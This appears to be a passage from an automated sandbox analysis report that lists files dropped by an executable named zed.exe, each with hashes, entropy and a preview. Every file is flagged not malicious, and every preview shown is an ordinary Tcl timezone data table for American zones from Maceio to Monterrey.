                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Maceio) {.. {-9223372036854775808 -8572 0 LMT}.. {-1767217028 -10800 0 -03}.. {-1206957600 -7200 1 -03}.. {-1191362400 -10800 0 -03}.. {-1175374800 -7200 1 -03}.. {-1159826400 -10800 0 -03}.. {-633819600 -7200 1 -03}.. {-622069200 -10800 0 -03}.. {-602283600 -7200 1 -03}.. {-591832800 -10800 0 -03}.. {-570747600 -7200 1 -03}.. {-560210400 -10800 0 -03}.. {-539125200 -7200 1 -03}.. {-531352800 -10800 0 -03}.. {-191365200 -7200 1 -03}.. {-184197600 -10800 0 -03}.. {-155163600 -7200 1 -03}.. {-150069600 -10800 0 -03}.. {-128898000 -7200 1 -03}.. {-121125600 -10800 0 -03}.. {-99954000 -7200 1 -03}.. {-89589600 -10800 0 -03}.. {-68418000 -7200 1 -03}.. {-57967200 -10800 0 -03}.. {499748400 -7200 1 -03}.. {511236000 -10800 0 -03}.. {530593200 -7200 1 -03}.. {540266400 -10800 0 -03}.. {562129200 -7200 1 -03}.. {571197600 -10800 0 -03}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):611
                                                                                                                                                                                                                                            Entropy (8bit):4.303621439025158
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:12:MB86290znTjmdHOYCvprv5EU/dLAyW+/uF+kX8/uF+RZ//dAWcP/QAWcx/uF+rbE:5GnPeOdvhxD1pLS+S8S+RVqzo4xS+3SJ
                                                                                                                                                                                                                                            MD5:FB09D1F064C30F9E223FA119A8875098
                                                                                                                                                                                                                                            SHA1:C66173FEB21761AEA649301D77FBB77ACF3A6FB1
                                                                                                                                                                                                                                            SHA-256:F0F0CCE8DE92D848A62B56EF48E01D763B80153C077230C435D464CF1733BA38
                                                                                                                                                                                                                                            SHA-512:BC3D841FF48FD0DE7C9ABF5DAE3A42C876BD4D7FBD6684B4513EC7ECC92D938A7133BCC873AD46E453DD1863E843E5C7DD14FFDB41B593E90BEB5CD8F7E66202
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Managua) {.. {-9223372036854775808 -20708 0 LMT}.. {-2524500892 -20712 0 MMT}.. {-1121105688 -21600 0 CST}.. {105084000 -18000 0 EST}.. {161758800 -21600 0 CST}.. {290584800 -18000 1 CDT}.. {299134800 -21600 0 CST}.. {322034400 -18000 1 CDT}.. {330584400 -21600 0 CST}.. {694260000 -18000 0 EST}.. {717310800 -21600 0 CST}.. {725868000 -18000 0 EST}.. {852094800 -21600 0 CST}.. {1113112800 -18000 1 CDT}.. {1128229200 -21600 0 CST}.. {1146384000 -18000 1 CDT}.. {1159682400 -21600 0 CST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1166
                                                                                                                                                                                                                                            Entropy (8bit):3.7842934576858482
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5GnqeKwnSRs//SFs/pS9/MHSW/WOSr/nSso/TSL/SSU/iS5X/LcSi/xScd/ZlSQz:5mSeSFESoSQSrSsCSeSPS1cSQSQlSsSQ
                                                                                                                                                                                                                                            MD5:E42719A9B0165490BB9E0E899EFB3643
                                                                                                                                                                                                                                            SHA1:2991D7EC31F47E32D2C8DB89A0F87D814122DD1B
                                                                                                                                                                                                                                            SHA-256:DC54E6D4FE14458B0462FA0E15B960FD4290930ADC0D13453BF49B436ED8C143
                                                                                                                                                                                                                                            SHA-512:F75024E27A2D679A667EA70EC948F983C7B823FDA5962DD88697D61147A6C2B1499E58BA8B01170653C4D025900491AE8E21925500DE39EACBAF883F7E62D874
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Manaus) {.. {-9223372036854775808 -14404 0 LMT}.. {-1767211196 -14400 0 -04}.. {-1206954000 -10800 1 -04}.. {-1191358800 -14400 0 -04}.. {-1175371200 -10800 1 -04}.. {-1159822800 -14400 0 -04}.. {-633816000 -10800 1 -04}.. {-622065600 -14400 0 -04}.. {-602280000 -10800 1 -04}.. {-591829200 -14400 0 -04}.. {-570744000 -10800 1 -04}.. {-560206800 -14400 0 -04}.. {-539121600 -10800 1 -04}.. {-531349200 -14400 0 -04}.. {-191361600 -10800 1 -04}.. {-184194000 -14400 0 -04}.. {-155160000 -10800 1 -04}.. {-150066000 -14400 0 -04}.. {-128894400 -10800 1 -04}.. {-121122000 -14400 0 -04}.. {-99950400 -10800 1 -04}.. {-89586000 -14400 0 -04}.. {-68414400 -10800 1 -04}.. {-57963600 -14400 0 -04}.. {499752000 -10800 1 -04}.. {511239600 -14400 0 -04}.. {530596800 -10800 1 -04}.. {540270000 -14400 0 -04}.. {562132800 -10800 1 -04}.. {571201200 -1
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):201
                                                                                                                                                                                                                                            Entropy (8bit):4.900738604616686
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7p5oeSHAIgppON/290zzJ/90ppv:MByMYbpwt290zzN90b
                                                                                                                                                                                                                                            MD5:8C60DE8E522FE5D51EACD643FD8EA132
                                                                                                                                                                                                                                            SHA1:2E09A71DF340ECA6F7AEBD978070D56A627049EC
                                                                                                                                                                                                                                            SHA-256:5C26D7CE93F91CC4F5ED87E9388B1B180EF9D84681044FD23CC01A628A1284CA
                                                                                                                                                                                                                                            SHA-512:D2D522D041AFA638542F6FF00F5F40325E3F117C5035BA71F676B4956B054542C67A753055D17E2E2EEA925F13EACC0969D01EC18E40D274D8EA408F92777EA2
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Puerto_Rico)]} {.. LoadTimeZoneFile America/Puerto_Rico..}..set TZData(:America/Marigot) $TZData(:America/Puerto_Rico)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):251
                                                                                                                                                                                                                                            Entropy (8bit):4.849143012086458
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9eg/290zlEDm2OHfueoHv9dMIqR5lRfT/VVFUFkmR/lAov:MB86290zimdHfnCv9dMIqR5lVb/uFkmD
                                                                                                                                                                                                                                            MD5:CFE10EE56115D3A5F44E047B3661D8ED
                                                                                                                                                                                                                                            SHA1:03F598CFC9AEDE2F588339B439B2361F2EBDE34F
                                                                                                                                                                                                                                            SHA-256:D411FB42798E93B106275EC0E054F8F3C4E9FB49431C656448739C7F20C46EDE
                                                                                                                                                                                                                                            SHA-512:25D6760FDF2F1B0DD91A41D29BDB7048FAE27A03F7B9D9C955ECF4C32E8402836D007B39FE62B93E7BEA017681A0C8AFC1C4CAFD823B0A6C41EDAF09DDF3435D
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Martinique) {.. {-9223372036854775808 -14660 0 LMT}.. {-2524506940 -14660 0 FFMT}.. {-1851537340 -14400 0 AST}.. {323841600 -10800 1 ADT}.. {338958000 -14400 0 AST}..}..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6745
                                                                                                                                                                                                                                            Entropy (8bit):3.8432520851585372
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:aD5NA604qSScBgN+4ctDzIVQ/c/3hNxTh:aDbA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:FC4A24AE95BA6E36285F09AB2FCEE56F
                                                                                                                                                                                                                                            SHA1:54ED1CD69247064B5EC775E907790D19E93A4626
                                                                                                                                                                                                                                            SHA-256:59C658CEA1BF5392A8F16295A09A74230EFB52EF7BF783E493E9A9C1799036F2
                                                                                                                                                                                                                                            SHA-512:2E8E65C487090DC8EE90F8575360A00E74C134CE34E83D4296E2CC32B773F9F0151F4049BFD1BEEAFE7B441E8684AF9FB50287E42FBD5182E4051D1FC39932E3
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Matamoros) {.. {-9223372036854775808 -23400 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2067
                                                                                                                                                                                                                                            Entropy (8bit):3.990817847620547
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:5GtXed9WUQwuz/V/NF01YmM/parZ375+XiB+:5sNUIdFS1YrpaV5+yB+
                                                                                                                                                                                                                                            MD5:43467194416FCF6F0D67AD2456D78646
                                                                                                                                                                                                                                            SHA1:1FDF02EF7354D9DB71F545D32AE52D018E99D801
                                                                                                                                                                                                                                            SHA-256:8140084EA9D6A478C34A114D9E216DC05450ECBE4809B2CDA194B40452E2AA0F
                                                                                                                                                                                                                                            SHA-512:EB5CD3E95779391F096EE9A7B16920C6C9E8A90F38C7A3CBE2B0E123D088A127C5BBE21F5883DCDAD4FBB2410ED052EDE3D4F1E260483D97FEBB7BA7022874C1
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mazatlan) {.. {-9223372036854775808 -25540 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-873828000 -25200 0 MST}.. {-661539600 -28800 0 PST}.. {28800 -25200 0 MST}.. {828867600 -21600 1 MDT}.. {846403200 -25200 0 MST}.. {860317200 -21600 1 MDT}.. {877852800 -25200 0 MST}.. {891766800 -21600 1 MDT}.. {909302400 -25200 0 MST}.. {923216400 -21600 1 MDT}.. {941356800 -25200 0 MST}.. {954666000 -21600 1 MDT}.. {972806400 -25200 0 MST}.. {989139600 -21600 1 MDT}.. {1001836800 -25200 0 MST}.. {1018170000 -21600 1 MDT}.. {1035705600 -25200 0 MST}.. {1049619600 -21600 1 MDT}.. {1067155200 -25200 0 MST}.. {1081069200 -21600 1 MDT}.. {1099209600 -25200 0 MST}.. {1112518800 -21600 1 MDT}.. {1130659200 -2520
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):219
                                                                                                                                                                                                                                            Entropy (8bit):4.812188311941308
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:6:SlSWB9vsM3y7/MeHAIgp/MSvYovN/290zpH+90/MX:MByMY/M/p/MSA6t290zpe90/MX
                                                                                                                                                                                                                                            MD5:2A3BFEEFBB684FB3B420A6B53B588BDC
                                                                                                                                                                                                                                            SHA1:CC5C0BB90D847CCBB45688A8DA460AD575D64617
                                                                                                                                                                                                                                            SHA-256:D6B308A1619F2DE450DACBFEF0E11B237DF7375A80C90899DD02B827688CB4B8
                                                                                                                                                                                                                                            SHA-512:4A35C80D3454E039383FFEB06DC84933B3201BE2487C42A448AF3DA5ABAEEB9882263C011CDD3194E121EC1C31FC80120BF7829F280A79996E376CFA828EE215
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit..if {![info exists TZData(America/Argentina/Mendoza)]} {.. LoadTimeZoneFile America/Argentina/Mendoza..}..set TZData(:America/Mendoza) $TZData(:America/Argentina/Mendoza)..
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):8410
                                                                                                                                                                                                                                            Entropy (8bit):3.8311875423131534
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:6quShLi8hbZlNA604qSScBgN+4ctDzIVQ/c/3hNxTh:6lSUqtfA604qSBgI7DBch
                                                                                                                                                                                                                                            MD5:C74D31382279219F805D2B138C58FBF7
                                                                                                                                                                                                                                            SHA1:06E2FED0A3BDF62F3D390A4054B6A2D7C1863DD3
                                                                                                                                                                                                                                            SHA-256:B0863F8B66F0848020651B69E7997307D62209259AE653FDC1A0FAFC8E793068
                                                                                                                                                                                                                                            SHA-512:7B42CBDC119651E2B2EE8B8F934801D3147A8B72EE060A0D0EA1C0C12CA9ABD03F1A102A85BF8E7424B45620151CE107D16A9173F4AA7597EDB3109840C1B2AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Menominee) {.. {-9223372036854775808 -21027 0 LMT}.. {-2659759773 -21600 0 CST}.. {-1633276800 -18000 1 CDT}.. {-1615136400 -21600 0 CST}.. {-1601827200 -18000 1 CDT}.. {-1583686800 -21600 0 CST}.. {-880214400 -18000 1 CWT}.. {-769395600 -18000 1 CPT}.. {-765392400 -21600 0 CST}.. {-757360800 -21600 0 CST}.. {-747244800 -18000 1 CDT}.. {-733942800 -21600 0 CST}.. {-116438400 -18000 1 CDT}.. {-100112400 -21600 0 CST}.. {-21484800 -18000 0 EST}.. {104914800 -21600 0 CST}.. {104918400 -18000 1 CDT}.. {120639600 -21600 0 CST}.. {126691200 -18000 1 CDT}.. {152089200 -21600 0 CST}.. {162374400 -18000 1 CDT}.. {183538800 -21600 0 CST}.. {199267200 -18000 1 CDT}.. {215593200 -21600 0 CST}.. {230716800 -18000 1 CDT}.. {247042800 -21600 0 CST}.. {262771200 -18000 1 CDT}.. {278492400 -21600 0 CST}.. {294220800 -18000 1 CDT}.. {309942000 -2160
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1877
                                                                                                                                                                                                                                            Entropy (8bit):3.9636871490767147
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5bu36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:1qehpYtj
                                                                                                                                                                                                                                            MD5:34909341A29FF048D83B707D12A728A5
                                                                                                                                                                                                                                            SHA1:A4D4EC31681DB5F9DA899E20C6789D10827E6D86
                                                                                                                                                                                                                                            SHA-256:ADE65ADDEEA027D1BE70DC7C12513B61FDF36289021E66982D527C7FEE2A2D19
                                                                                                                                                                                                                                            SHA-512:57EED40425680CE2C05D961D3F21EE2E0D204E1FD6D3DB5F1EF7AC349AA269F9397D4E2121BD13BC3DE34205564FBE009CEEB5ADE4052EA742CBA15A91F5822B
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Merida) {.. {-9223372036854775808 -21508 0 LMT}.. {-1514743200 -21600 0 CST}.. {377935200 -18000 0 EST}.. {407653200 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0 CST}.. {1207468800 -18000 1 CDT}.. {1225004400 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):6705
                                                                                                                                                                                                                                            Entropy (8bit):3.985641709481311
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:96:4DCG0haiaJCUbtp0nFI+g/iexpCVaBnNnt61nctE1:42G0IiaJCUbPI+D/iMpCIBSuk
                                                                                                                                                                                                                                            MD5:4999FE49C1640402CB432BC1EB667479
                                                                                                                                                                                                                                            SHA1:2ED0044927A66856090793ED6E5FF634617C8C40
                                                                                                                                                                                                                                            SHA-256:2574831391092AD44D7B2806EEF30D59CE3BAE872111917DD39EC51EFDD62E5F
                                                                                                                                                                                                                                            SHA-512:39DE1D24037F3FFA3101BBAA885939074E596479F68013CDA9CE53A061EA704F63FB55C15B68B66B0E29E3F07ADC0BDC2D78A2D289277E75D2EF95F54988DB74
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Metlakatla) {.. {-9223372036854775808 54822 0 LMT}.. {-3225223727 -31578 0 LMT}.. {-2188955622 -28800 0 PST}.. {-883584000 -28800 0 PST}.. {-880207200 -25200 1 PWT}.. {-769395600 -25200 1 PPT}.. {-765385200 -28800 0 PST}.. {-757353600 -28800 0 PST}.. {-31507200 -28800 0 PST}.. {-21477600 -25200 1 PDT}.. {-5756400 -28800 0 PST}.. {9972000 -25200 1 PDT}.. {25693200 -28800 0 PST}.. {41421600 -25200 1 PDT}.. {57747600 -28800 0 PST}.. {73476000 -25200 1 PDT}.. {89197200 -28800 0 PST}.. {104925600 -25200 1 PDT}.. {120646800 -28800 0 PST}.. {126698400 -25200 1 PDT}.. {152096400 -28800 0 PST}.. {162381600 -25200 1 PDT}.. {183546000 -28800 0 PST}.. {199274400 -25200 1 PDT}.. {215600400 -28800 0 PST}.. {230724000 -25200 1 PDT}.. {247050000 -28800 0 PST}.. {262778400 -25200 1 PDT}.. {278499600 -28800 0 PST}.. {294228000 -25200 1 PDT}.. {30
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2261
                                                                                                                                                                                                                                            Entropy (8bit):3.9546083289866267
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5CBUBUI+n36fELf5On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:EB7qehpYtj
                                                                                                                                                                                                                                            MD5:7A67EA7FF5AC0E9B088298007A9370F4
                                                                                                                                                                                                                                            SHA1:531583F67E0C6ABA95B5A664A555BF40BF743CE8
                                                                                                                                                                                                                                            SHA-256:E83DB749E6AA87FD56829C2810D0F93A4194E3EE2CB0BDC12114B1EF55E92E96
                                                                                                                                                                                                                                            SHA-512:2C9035B415E36A769782FCFA15D79E5FEACA232439D1442407C8CD8C144EE9991030D9D58D2AD54CF6C0840BF78C81921B82BECBC74ABBD0DAC627F77772F52F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Mexico_City) {.. {-9223372036854775808 -23796 0 LMT}.. {-1514739600 -25200 0 MST}.. {-1343066400 -21600 0 CST}.. {-1234807200 -25200 0 MST}.. {-1220292000 -21600 1 MDT}.. {-1207159200 -25200 0 MST}.. {-1191344400 -21600 0 CST}.. {-975261600 -18000 1 CDT}.. {-963169200 -21600 0 CST}.. {-917114400 -18000 1 CDT}.. {-907354800 -21600 0 CST}.. {-821901600 -18000 1 CWT}.. {-810068400 -21600 0 CST}.. {-627501600 -18000 1 CDT}.. {-612990000 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001836800 -21600 0 CST}.. {1014184800 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {10357020
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):7080
                                                                                                                                                                                                                                            Entropy (8bit):3.5379714312244217
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:2UViR+iORv7bw1aW5AnMyxH5e+fHbxMfOp6D7bF8qMmqyiqV1mjZe7JhlgXY7FWN:02l5qJZS
                                                                                                                                                                                                                                            MD5:C68889AA813C399939FCFA54E9CE0DFB
                                                                                                                                                                                                                                            SHA1:F3D58D7BEFF2D1CB94FECE00C31FEF5BDF58C231
                                                                                                                                                                                                                                            SHA-256:1B131AC968F95652667BD7EB1F6D667C8F679B31270D82B4B4271E787386CCCA
                                                                                                                                                                                                                                            SHA-512:EBAF8210919E34668E9DDFCB546E5A62F35954957AAE956B6302BF296C7D4CF51E1B10FB13217CB3EEB430DAC246217EB4E9250CB4109C95D8A4367457D02771
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Miquelon) {.. {-9223372036854775808 -13480 0 LMT}.. {-1850328920 -14400 0 AST}.. {326001600 -10800 0 -03}.. {536468400 -10800 0 -02}.. {544597200 -7200 1 -02}.. {562132800 -10800 0 -02}.. {576046800 -7200 1 -02}.. {594187200 -10800 0 -02}.. {607496400 -7200 1 -02}.. {625636800 -10800 0 -02}.. {638946000 -7200 1 -02}.. {657086400 -10800 0 -02}.. {671000400 -7200 1 -02}.. {688536000 -10800 0 -02}.. {702450000 -7200 1 -02}.. {719985600 -10800 0 -02}.. {733899600 -7200 1 -02}.. {752040000 -10800 0 -02}.. {765349200 -7200 1 -02}.. {783489600 -10800 0 -02}.. {796798800 -7200 1 -02}.. {814939200 -10800 0 -02}.. {828853200 -7200 1 -02}.. {846388800 -10800 0 -02}.. {860302800 -7200 1 -02}.. {877838400 -10800 0 -02}.. {891752400 -7200 1 -02}.. {909288000 -10800 0 -02}.. {923202000 -7200 1 -02}.. {941342400 -10800 0 -02}.. {954651600 -7200
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):10507
                                                                                                                                                                                                                                            Entropy (8bit):3.8204583916930557
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:192:X9+FPHyXFRsivcQYM+T7Z/xVQzxmtBWIXrObx29x8sLxcGMe++wzlrfFjxKvnpNM:gF6L0d0F2TzNc/1cYUH+CC
                                                                                                                                                                                                                                            MD5:80B88F57B837CD2478815796618A6AC6
                                                                                                                                                                                                                                            SHA1:CC2BE0213E9F0D3B307A8311D7A1013582E8A338
                                                                                                                                                                                                                                            SHA-256:D977D045DE5CDAEB41189B91963E03EF845CA4B45E496649B4CB541EE1B5DD22
                                                                                                                                                                                                                                            SHA-512:9410CBD706CAABFFF88DFF75235597D844B45A061EBD796F6708D7CEAB680273571A17935B7CCFC7C466ABF293C286D0886F47880E692F74C4E8BFB41729C73C
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Moncton) {.. {-9223372036854775808 -15548 0 LMT}.. {-2715882052 -18000 0 EST}.. {-2131642800 -14400 0 AST}.. {-1632074400 -10800 1 ADT}.. {-1615143600 -14400 0 AST}.. {-1167595200 -14400 0 AST}.. {-1153681200 -10800 1 ADT}.. {-1145822400 -14400 0 AST}.. {-1122231600 -10800 1 ADT}.. {-1114372800 -14400 0 AST}.. {-1090782000 -10800 1 ADT}.. {-1082923200 -14400 0 AST}.. {-1059332400 -10800 1 ADT}.. {-1051473600 -14400 0 AST}.. {-1027882800 -10800 1 ADT}.. {-1020024000 -14400 0 AST}.. {-996433200 -10800 1 ADT}.. {-988574400 -14400 0 AST}.. {-965674800 -10800 1 ADT}.. {-955396800 -14400 0 AST}.. {-934743600 -10800 1 ADT}.. {-923947200 -14400 0 AST}.. {-904503600 -10800 1 ADT}.. {-891892800 -14400 0 AST}.. {-883598400 -14400 0 AST}.. {-880221600 -10800 1 AWT}.. {-769395600 -10800 1 APT}.. {-765399600 -14400 0 AST}.. {-757368000 -14400 0 AST
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):1940
                                                                                                                                                                                                                                            Entropy (8bit):3.9628147491173964
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:5JZKy36fELf0On9uhcinzPPoUlWQnH7eelN5Lh9LY5Lj:XwDqehpYtj
                                                                                                                                                                                                                                            MD5:4AE2B33D9DACE0E582FA456B361C50B7
                                                                                                                                                                                                                                            SHA1:5D62287F072F3687EF130BB1A9DD97BB2ABCF91C
                                                                                                                                                                                                                                            SHA-256:F5A66A403BF40BE7EAB188F3CEC8D7DB700F60084F7B856AB87E0AA4A0F2C0B6
                                                                                                                                                                                                                                            SHA-512:39BE803FD47709A1120FC8E09DB9B294DE41F69C7DD86AAB03AD8D0878B160B21D82B16398125559B792DAE99D5D917AE466C536001FEC1E618B68ACA9A80322
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:# created by tools/tclZIC.tcl - do not edit....set TZData(:America/Monterrey) {.. {-9223372036854775808 -24076 0 LMT}.. {-1514743200 -21600 0 CST}.. {568015200 -21600 0 CST}.. {576057600 -18000 1 CDT}.. {594198000 -21600 0 CST}.. {599637600 -21600 0 CST}.. {828864000 -18000 1 CDT}.. {846399600 -21600 0 CST}.. {860313600 -18000 1 CDT}.. {877849200 -21600 0 CST}.. {891763200 -18000 1 CDT}.. {909298800 -21600 0 CST}.. {923212800 -18000 1 CDT}.. {941353200 -21600 0 CST}.. {954662400 -18000 1 CDT}.. {972802800 -21600 0 CST}.. {989136000 -18000 1 CDT}.. {1001833200 -21600 0 CST}.. {1018166400 -18000 1 CDT}.. {1035702000 -21600 0 CST}.. {1049616000 -18000 1 CDT}.. {1067151600 -21600 0 CST}.. {1081065600 -18000 1 CDT}.. {1099206000 -21600 0 CST}.. {1112515200 -18000 1 CDT}.. {1130655600 -21600 0 CST}.. {1143964800 -18000 1 CDT}.. {1162105200 -21600 0 CST}.. {1175414400 -18000 1 CDT}.. {1193554800 -21600 0
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2936
                                                                                                                                                                                                                                            Entropy (8bit):3.6410670126139046
